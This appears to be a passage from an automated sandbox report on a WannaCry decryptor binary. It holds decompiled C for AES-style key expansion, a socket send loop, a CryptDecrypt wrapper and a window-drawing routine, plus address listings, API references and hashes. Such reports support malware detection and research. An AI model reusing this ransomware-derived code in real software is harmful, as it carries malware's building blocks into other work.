					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				_t170 =  *(_t399 + 0x20);
				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_t170 = _t399 + 8;
					_push(0x41c9c0);
					_push(_t170);
					L004130FC();
				}
				_t238 =  *(_t399 + 0x24);
				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
					_t238 = _t399 + 0xc;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				 *(_t236 + 0x3c8) = _t170;
				 *(_t236 + 0x3cc) = _t238;
				_t290 = _t238;
				_t385 =  *(_t399 + 0x20);
				_t19 = _t236 + 0x3d0; // 0x424
				_t239 = _t238 >> 2;
				memcpy(_t19, _t385, _t239 << 2);
				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
				_t22 = _t236 + 0x3f0; // 0x444
				_t245 =  *(_t236 + 0x3cc) >> 2;
				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
				_t403 = _t399 + 0x30;
				_t177 =  *(_t236 + 0x3c8);
				if(_t177 == 0x10) {
					_t178 =  *(_t236 + 0x3cc);
					if(_t178 != 0x10) {
						asm("sbb eax, eax");
						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
					} else {
						_t182 = 0xa;
					}
					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
				} else {
					if(_t177 == 0x18) {
						asm("sbb ecx, ecx");
						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
					} else {
						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
					}
				}
				asm("cdq");
				_t292 = 0;
				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
				 *(_t403 + 0x2c) = _t251;
				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
					L23:
					_t293 = 0;
					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
						L28:
						_t44 = _t236 + 0x414; // 0x468
						_t387 = _t44;
						asm("cdq");
						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
						 *(_t403 + 0x30) = _t353;
						_t189 =  *(_t403 + 0x24);
						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
						 *(_t403 + 0x10) = _t395;
						if(_t395 <= 0) {
							L31:
							_t388 = 0;
							if(_t395 <= 0) {
								L35:
								if(_t388 >= _t353) {
									L51:
									_t190 = 1;
									 *(_t403 + 0x30) = 1;
									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
										L58:
										 *((char*)(_t236 + 4)) = 1;
										return _t190;
									}
									_t151 = _t236 + 0x208; // 0x25c
									_t397 = _t151;
									do {
										if(_t251 <= 0) {
											goto L57;
										}
										_t390 = _t397;
										_t355 = _t251;
										do {
											_t192 =  *_t390;
											 *(_t403 + 0x24) = _t192;
											_t390 =  &(_t390[1]);
											_t355 = _t355 - 1;
											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
										} while (_t355 != 0);
										_t251 =  *(_t403 + 0x2c);
										L57:
										_t190 =  *(_t403 + 0x30) + 1;
										_t397 =  &(_t397[8]);
										 *(_t403 + 0x30) = _t190;
									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
									goto L58;
								}
								 *(_t403 + 0x28) = 0x41a1b0;
								do {
									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
									if(_t395 == 8) {
										_t104 = _t236 + 0x418; // 0x46c
										_t198 = _t104;
										_t268 = 3;
										do {
											 *_t198 =  *_t198 ^  *(_t198 - 4);
											_t198 =  &(_t198[1]);
											_t268 = _t268 - 1;
										} while (_t268 != 0);
										 *(_t403 + 0x24) =  *(_t236 + 0x420);
										_t275 = 3;
										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
										_t116 = _t236 + 0x428; // 0x47c
										_t203 = _t116;
										do {
											 *_t203 =  *_t203 ^  *(_t203 - 4);
											_t203 =  &(_t203[1]);
											_t275 = _t275 - 1;
										} while (_t275 != 0);
										L46:
										 *(_t403 + 0x24) = 0;
										if(_t395 <= 0) {
											goto L50;
										}
										_t119 = _t236 + 0x414; // 0x468
										_t375 = _t119;
										while(1) {
											_t251 =  *(_t403 + 0x2c);
											if(_t388 >=  *(_t403 + 0x30)) {
												goto L51;
											}
											_t398 =  *_t375;
											asm("cdq");
											_t375 = _t375 + 4;
											_t276 = _t388 / _t251;
											asm("cdq");
											_t317 = _t388 %  *(_t403 + 0x2c);
											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
											_t395 =  *(_t403 + 0x10);
											_t214 =  *(_t403 + 0x24) + 1;
											_t388 = _t388 + 1;
											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
											 *(_t403 + 0x24) = _t214;
											if(_t214 < _t395) {
												continue;
											}
											goto L50;
										}
										goto L51;
									}
									if(_t395 <= 1) {
										goto L46;
									}
									_t101 = _t236 + 0x418; // 0x46c
									_t215 = _t101;
									_t278 = _t395 - 1;
									do {
										 *_t215 =  *_t215 ^  *(_t215 - 4);
										_t215 =  &(_t215[1]);
										_t278 = _t278 - 1;
									} while (_t278 != 0);
									goto L46;
									L50:
									_t251 =  *(_t403 + 0x2c);
								} while (_t388 <  *(_t403 + 0x30));
								goto L51;
							}
							_t58 = _t236 + 0x414; // 0x468
							 *(_t403 + 0x24) = _t58;
							while(_t388 < _t353) {
								asm("cdq");
								_t378 = _t388 / _t251;
								asm("cdq");
								_t321 = _t388 % _t251;
								 *(_t403 + 0x28) = _t321;
								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
								_t388 = _t388 + 1;
								_t224 =  *(_t403 + 0x24);
								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
								_t353 =  *(_t403 + 0x30);
								 *(_t403 + 0x24) = _t224 + 4;
								if(_t388 < _t395) {
									continue;
								}
								goto L35;
							}
							goto L51;
						}
						 *(_t403 + 0x24) = _t395;
						do {
							_t387 = _t387 + 4;
							 *(_t387 - 4) = 0 << 0x18;
							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
							_t189 = _t189 + 4;
							_t337 =  *(_t403 + 0x24) - 1;
							 *(_t403 + 0x24) = _t337;
						} while (_t337 != 0);
						goto L31;
					}
					_t38 = _t236 + 0x1e8; // 0x23c
					_t391 = _t38;
					do {
						if(_t251 > 0) {
							memset(_t391, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t293 = _t293 + 1;
						_t391 = _t391 + 0x20;
					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L28;
				} else {
					_t33 = _t236 + 8; // 0x5c
					_t392 = _t33;
					do {
						if(_t251 > 0) {
							memset(_t392, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t292 = _t292 + 1;
						_t392 = _t392 + 0x20;
					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L23;
				}
			}














































                                                      0x0040a15a
                                                      0x0040a15c
                                                      0x0040a167
                                                      0x0040a16f
                                                      0x0040a179
                                                      0x0040a17e
                                                      0x0040a17f
                                                      0x0040a17f
                                                      0x0040a184
                                                      0x0040a18b
                                                      0x0040a1a0
                                                      0x0040a1a8
                                                      0x0040a1ae
                                                      0x0040a1b2
                                                      0x0040a1b7
                                                      0x0040a1b8
                                                      0x0040a1b8
                                                      0x0040a1bd
                                                      0x0040a1c4
                                                      0x0040a1d4
                                                      0x0040a1dd
                                                      0x0040a1e1
                                                      0x0040a1eb
                                                      0x0040a1f0
                                                      0x0040a1f1
                                                      0x0040a1f1
                                                      0x0040a1f7
                                                      0x0040a201
                                                      0x0040a208
                                                      0x0040a20b
                                                      0x0040a20d
                                                      0x0040a213
                                                      0x0040a216
                                                      0x0040a225
                                                      0x0040a229
                                                      0x0040a22f
                                                      0x0040a239
                                                      0x0040a239
                                                      0x0040a23b
                                                      0x0040a244
                                                      0x0040a272
                                                      0x0040a27b
                                                      0x0040a289
                                                      0x0040a28e
                                                      0x0040a27d
                                                      0x0040a27d
                                                      0x0040a27d
                                                      0x0040a291
                                                      0x0040a246
                                                      0x0040a249
                                                      0x0040a262
                                                      0x0040a26a
                                                      0x0040a24b
                                                      0x0040a24b
                                                      0x0040a24b
                                                      0x0040a249
                                                      0x0040a29d
                                                      0x0040a2a3
                                                      0x0040a2ad
                                                      0x0040a2b2
                                                      0x0040a2b6
                                                      0x0040a2d7
                                                      0x0040a2dd
                                                      0x0040a2e1
                                                      0x0040a305
                                                      0x0040a312
                                                      0x0040a312
                                                      0x0040a318
                                                      0x0040a319
                                                      0x0040a31f
                                                      0x0040a327
                                                      0x0040a32b
                                                      0x0040a330
                                                      0x0040a334
                                                      0x0040a36e
                                                      0x0040a36e
                                                      0x0040a372
                                                      0x0040a3cf
                                                      0x0040a3d1
                                                      0x0040a576
                                                      0x0040a57c
                                                      0x0040a583
                                                      0x0040a587
                                                      0x0040a5f3
                                                      0x0040a5f5
                                                      0x0040a5fe
                                                      0x0040a5fe
                                                      0x0040a589
                                                      0x0040a589
                                                      0x0040a58f
                                                      0x0040a591
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a593
                                                      0x0040a595
                                                      0x0040a597
                                                      0x0040a597
                                                      0x0040a59b
                                                      0x0040a5a5
                                                      0x0040a5d3
                                                      0x0040a5d4
                                                      0x0040a5d4
                                                      0x0040a5d9
                                                      0x0040a5dd
                                                      0x0040a5e7
                                                      0x0040a5e8
                                                      0x0040a5ed
                                                      0x0040a5ed
                                                      0x00000000
                                                      0x0040a58f
                                                      0x0040a3d7
                                                      0x0040a3df
                                                      0x0040a3e8
                                                      0x0040a446
                                                      0x0040a44c
                                                      0x0040a450
                                                      0x0040a478
                                                      0x0040a478
                                                      0x0040a47e
                                                      0x0040a483
                                                      0x0040a48a
                                                      0x0040a48c
                                                      0x0040a48f
                                                      0x0040a48f
                                                      0x0040a49a
                                                      0x0040a4e0
                                                      0x0040a4ec
                                                      0x0040a4f2
                                                      0x0040a4f2
                                                      0x0040a4f8
                                                      0x0040a4ff
                                                      0x0040a501
                                                      0x0040a504
                                                      0x0040a504
                                                      0x0040a507
                                                      0x0040a509
                                                      0x0040a511
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a513
                                                      0x0040a513
                                                      0x0040a519
                                                      0x0040a51d
                                                      0x0040a523
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a527
                                                      0x0040a529
                                                      0x0040a52c
                                                      0x0040a52f
                                                      0x0040a533
                                                      0x0040a534
                                                      0x0040a53b
                                                      0x0040a545
                                                      0x0040a555
                                                      0x0040a556
                                                      0x0040a559
                                                      0x0040a560
                                                      0x0040a564
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a564
                                                      0x00000000
                                                      0x0040a519
                                                      0x0040a455
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a45b
                                                      0x0040a45b
                                                      0x0040a461
                                                      0x0040a464
                                                      0x0040a46b
                                                      0x0040a46d
                                                      0x0040a470
                                                      0x0040a470
                                                      0x00000000
                                                      0x0040a566
                                                      0x0040a56a
                                                      0x0040a56e
                                                      0x00000000
                                                      0x0040a3df
                                                      0x0040a374
                                                      0x0040a37a
                                                      0x0040a37e
                                                      0x0040a388
                                                      0x0040a38b
                                                      0x0040a38f
                                                      0x0040a390
                                                      0x0040a392
                                                      0x0040a39f
                                                      0x0040a3af
                                                      0x0040a3b3
                                                      0x0040a3bc
                                                      0x0040a3c3
                                                      0x0040a3c9
                                                      0x0040a3cd
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a3cd
                                                      0x00000000
                                                      0x0040a37e
                                                      0x0040a336
                                                      0x0040a33a
                                                      0x0040a33c
                                                      0x0040a344
                                                      0x0040a34f
                                                      0x0040a366
                                                      0x0040a367
                                                      0x0040a368
                                                      0x0040a368
                                                      0x00000000
                                                      0x0040a33a
                                                      0x0040a2e3
                                                      0x0040a2e3
                                                      0x0040a2e9
                                                      0x0040a2eb
                                                      0x0040a2f1
                                                      0x0040a2f1
                                                      0x0040a2f3
                                                      0x0040a2f3
                                                      0x0040a2fd
                                                      0x0040a2fe
                                                      0x0040a301
                                                      0x00000000
                                                      0x0040a2b8
                                                      0x0040a2b8
                                                      0x0040a2b8
                                                      0x0040a2bb
                                                      0x0040a2bd
                                                      0x0040a2c3
                                                      0x0040a2c3
                                                      0x0040a2c5
                                                      0x0040a2c5
                                                      0x0040a2cf
                                                      0x0040a2d0
                                                      0x0040a2d3
                                                      0x00000000
                                                      0x0040a2bb

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                                      • Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
                                                      • Opcode Fuzzy Hash: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                                      • Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D300 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
				void _v1024;
				char _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				void* _v1040;
				intOrPtr _v1044;
				char _v1048;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				void* _t43;
				void* _t45;
				intOrPtr _t46;
				void* _t49;
				signed int _t58;
				intOrPtr* _t60;
				signed int _t70;
				signed int _t71;
				signed int _t78;
				void* _t83;
				void* _t91;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void** _t107;
				void** _t109;

				_t106 =  &_v1040;
				_t105 = _a8;
				_t60 = __ecx;
				_v1032 = 0;
				if(_t105 != 0) {
					_t34 = E0040D5D0(__ecx);
					__eflags = _t34;
					if(_t34 != 0) {
						__eflags = _a12;
						if(_a12 == 0) {
							_t36 = _a4;
							_v1040 = _t36;
							_t91 = _t36;
							goto L13;
						} else {
							__eflags = _a16;
							if(_a16 != 0) {
								__eflags = _t105 - 0x400;
								if(_t105 > 0x400) {
									_t49 = E00412A90(_t105);
									_t109 =  &(( &_v1040)[1]);
									_v1040 = _t49;
									__eflags = _t49;
									if(_t49 != 0) {
										_t103 = _a4;
										_t70 = _t105;
										_t71 = _t70 >> 2;
										memcpy(_t49, _t103, _t71 << 2);
										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
										_t106 =  &(_t109[6]);
										_t91 = _v1040;
										E0040D2B0(_t60, _t91, _t105);
										goto L13;
									} else {
										return _t49;
									}
								} else {
									_t104 = _a4;
									_t78 = _t105 >> 2;
									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
									_t106 =  &(( &_v1040)[6]);
									_t83 =  &_v1024;
									_t91 = _t83;
									_v1040 = _t83;
									E0040D2B0(_t60, _t91, _t105);
									goto L13;
								}
							} else {
								_t91 = _a4;
								E0040D2B0(__ecx, _t91, _t105);
								L13:
								_push( &_v1028);
								L0041303E();
								_t37 = _v1028;
								_t107 =  &(_t106[1]);
								_t102 = 0;
								_v1036 = _t37;
								__eflags = _t105;
								if(_t105 > 0) {
									while(1) {
										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
											goto L25;
										}
										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
										__eflags = _t43;
										if(__eflags > 0) {
											_t102 = _t102 + _t43;
											__eflags = _t102;
											_push( &_v1048);
											goto L24;
										} else {
											if(__eflags != 0) {
												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
												__eflags = _t45 - 0x2733;
												if(_t45 == 0x2733) {
													_t46 = _v1044;
													__eflags = _t46 - 0x64;
													_v1044 = _t46 + 1;
													if(_t46 > 0x64) {
														Sleep(0x64);
														_v1044 = 0;
													}
													_push( &_v1048);
													L24:
													L0041303E();
													_t107 =  &(_t107[1]);
													__eflags = _t102 - _t105;
													if(_t102 < _t105) {
														_t37 = _v1048;
														continue;
													}
												}
											}
										}
										goto L25;
									}
								}
								L25:
								__eflags = _t91 - _a4;
								if(_t91 != _a4) {
									__eflags = _t91 -  &_v1024;
									if(_t91 !=  &_v1024) {
										__eflags = _t91;
										if(_t91 != 0) {
											free(_t91);
										}
									}
								}
								return _t102;
							}
						}
					} else {
						_t58 = _t34 | 0xffffffff;
						__eflags = _t58;
						return _t58;
					}
				} else {
					return 0;
				}
			}






























                                                      0x0040d300
                                                      0x0040d308
                                                      0x0040d313
                                                      0x0040d315
                                                      0x0040d31d
                                                      0x0040d330
                                                      0x0040d335
                                                      0x0040d337
                                                      0x0040d350
                                                      0x0040d352
                                                      0x0040d3f6
                                                      0x0040d3fd
                                                      0x0040d401
                                                      0x00000000
                                                      0x0040d358
                                                      0x0040d35f
                                                      0x0040d361
                                                      0x0040d378
                                                      0x0040d37e
                                                      0x0040d3b1
                                                      0x0040d3b6
                                                      0x0040d3b9
                                                      0x0040d3bd
                                                      0x0040d3bf
                                                      0x0040d3ce
                                                      0x0040d3d5
                                                      0x0040d3db
                                                      0x0040d3de
                                                      0x0040d3e6
                                                      0x0040d3e6
                                                      0x0040d3e8
                                                      0x0040d3ef
                                                      0x00000000
                                                      0x0040d3cb
                                                      0x0040d3cb
                                                      0x0040d3cb
                                                      0x0040d380
                                                      0x0040d380
                                                      0x0040d38f
                                                      0x0040d39a
                                                      0x0040d39a
                                                      0x0040d39c
                                                      0x0040d3a0
                                                      0x0040d3a2
                                                      0x0040d3a9
                                                      0x00000000
                                                      0x0040d3a9
                                                      0x0040d363
                                                      0x0040d363
                                                      0x0040d36e
                                                      0x0040d403
                                                      0x0040d407
                                                      0x0040d408
                                                      0x0040d40d
                                                      0x0040d411
                                                      0x0040d414
                                                      0x0040d416
                                                      0x0040d41a
                                                      0x0040d41c
                                                      0x0040d424
                                                      0x0040d42d
                                                      0x0040d42f
                                                      0x00000000
                                                      0x00000000
                                                      0x0040d442
                                                      0x0040d445
                                                      0x0040d447
                                                      0x0040d480
                                                      0x0040d480
                                                      0x0040d486
                                                      0x00000000
                                                      0x0040d449
                                                      0x0040d449
                                                      0x0040d44f
                                                      0x0040d452
                                                      0x0040d457
                                                      0x0040d459
                                                      0x0040d460
                                                      0x0040d463
                                                      0x0040d467
                                                      0x0040d46b
                                                      0x0040d471
                                                      0x0040d471
                                                      0x0040d47d
                                                      0x0040d487
                                                      0x0040d487
                                                      0x0040d48c
                                                      0x0040d48f
                                                      0x0040d491
                                                      0x0040d420
                                                      0x00000000
                                                      0x0040d420
                                                      0x0040d491
                                                      0x0040d457
                                                      0x0040d449
                                                      0x00000000
                                                      0x0040d447
                                                      0x0040d424
                                                      0x0040d493
                                                      0x0040d493
                                                      0x0040d49a
                                                      0x0040d4a0
                                                      0x0040d4a2
                                                      0x0040d4a4
                                                      0x0040d4a6
                                                      0x0040d4a9
                                                      0x0040d4ae
                                                      0x0040d4a6
                                                      0x0040d4a2
                                                      0x0040d4bd
                                                      0x0040d4bd
                                                      0x0040d361
                                                      0x0040d33c
                                                      0x0040d33c
                                                      0x0040d33c
                                                      0x0040d346
                                                      0x0040d346
                                                      0x0040d322
                                                      0x0040d32b
                                                      0x0040d32b

                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                                      • Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
                                                      • Opcode Fuzzy Hash: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                                      • Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404AF0 Relevance: 6.1, APIs: 4, Instructions: 51encryptionCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E00404AF0(void* __ecx, void* _a4, int _a8) {
				intOrPtr* _v4;
				void* _v8;
				signed int _v12;
				int _t12;
				void* _t19;
				signed int _t22;
				signed int _t23;
				struct _CRITICAL_SECTION* _t30;
				void* _t36;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					_t2 = _t19 + 0x10; // 0x14
					_t30 = _t2;
					EnterCriticalSection(_t30);
					_t36 = _a4;
					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
					_push(_t30);
					if(_t12 != 0) {
						LeaveCriticalSection();
						_t22 = _v12;
						_t23 = _t22 >> 2;
						memcpy(_v8, _t36, _t23 << 2);
						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
						return 1;
					} else {
						LeaveCriticalSection();
						return 0;
					}
				} else {
					return 0;
				}
			}












                                                      0x00404af1
                                                      0x00404afa
                                                      0x00404b04
                                                      0x00404b04
                                                      0x00404b08
                                                      0x00404b0e
                                                      0x00404b22
                                                      0x00404b2a
                                                      0x00404b2b
                                                      0x00404b3b
                                                      0x00404b49
                                                      0x00404b4d
                                                      0x00404b50
                                                      0x00404b60
                                                      0x00404b67
                                                      0x00404b2d
                                                      0x00404b2d
                                                      0x00404b38
                                                      0x00404b38
                                                      0x00404afe
                                                      0x00404b01
                                                      0x00404b01

                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
                                                      • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CryptDecryptEnterLeave
                                                      • String ID:
                                                      • API String ID: 1395129968-0
                                                      • Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                                      • Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
                                                      • Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                                      • Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004090F0 Relevance: 56.5, APIs: 21, Strings: 11, Instructions: 454windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 271 4090f0-40911e 272 409124-40915c #540 #3874 271->272 273 40971e-409736 271->273 274 409185-40918c 272->274 275 40915e-409163 272->275 276 40919c-4091c4 _ftol 274->276 277 40918e-409197 #860 274->277 278 409165-40916c 275->278 279 4091c8-4091cf 275->279 276->279 277->276 282 40917c-409183 278->282 283 40916e-409177 #860 278->283 280 4091d5-409327 SendMessageA #2860 call 409df0 call 409870 #5875 #6170 GetWindowOrgEx #540 #2818 279->280 281 40970a-409719 #800 279->281 289 409329-409357 GetObjectA 280->289 290 40935b-409389 GetTextExtentPoint32A 280->290 281->273 282->279 283->282 289->290 291 4093a1-4093a4 290->291 292 40938b-40939f 290->292 294 4093a6-4093b6 291->294 295 4093b8-4093bd 291->295 293 4093f6-40940b GetViewportOrgEx 292->293 299 409411-409430 call 409d40 293->299 300 4094a9-4094f3 293->300 296 4093f2 294->296 297 4093d9-4093de 295->297 298 4093bf-4093d7 295->298 296->293 297->293 301 4093e0-4093f0 297->301 298->293 307 409432 299->307 308 409436-409444 299->308 305 4094f5-409512 300->305 306 409517-409525 300->306 301->296 311 40961a-409658 #800 305->311 309 409527-409535 306->309 310 40953d-409553 306->310 307->308 308->311 312 40944a-4094a4 308->312 309->310 314 4095b3-4095bf 310->314 315 409555-409568 310->315 319 409662-40967b 311->319 320 40965a-40965d #6170 311->320 322 409610-409612 312->322 314->311 318 4095c1-4095d1 314->318 326 40956a 315->326 327 40956e-4095ab 315->327 328 4095d3 318->328 329 4095d7-40960c 318->329 324 409685-40969c 319->324 325 40967d-409680 #5875 319->325 320->319 322->311 330 4096a6-4096bc 324->330 331 40969e-4096a1 324->331 325->324 326->327 327->314 328->329 329->322 332 4096c8-409702 #2414 * 2 330->332 333 4096be-4096c3 330->333 331->330 332->281 333->332
                                                      C-Code - Quality: 86%
                                                      			E004090F0(intOrPtr* __ecx, void* __fp0) {
				signed int _t226;
				signed int _t230;
				struct tagPOINT _t232;
				long _t233;
				signed int _t237;
				signed int _t242;
				intOrPtr _t246;
				intOrPtr* _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t276;
				intOrPtr _t279;
				signed int _t282;
				intOrPtr* _t283;
				struct tagPOINT _t295;
				signed int _t311;
				signed int _t314;
				signed int** _t321;
				intOrPtr _t361;
				intOrPtr _t418;
				intOrPtr* _t429;
				signed int* _t433;
				long _t437;
				signed int _t438;
